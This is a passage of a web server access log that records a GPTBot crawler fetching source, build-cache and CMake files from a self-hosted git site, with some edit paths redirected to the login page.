like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:18:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11351] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:18:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:18:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11373] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:18:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9862] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:18:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:18:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:18:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:18:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10300] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" -[17/Feb/2026:18:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10126] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" -[17/Feb/2026:18:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11674] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/settings.json" -[17/Feb/2026:18:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fpyimod02_importers.pyc" [Client 74.7.227.38] [Length 19826] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14130] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11158] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:18:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14173] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:18:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11133] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:18:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 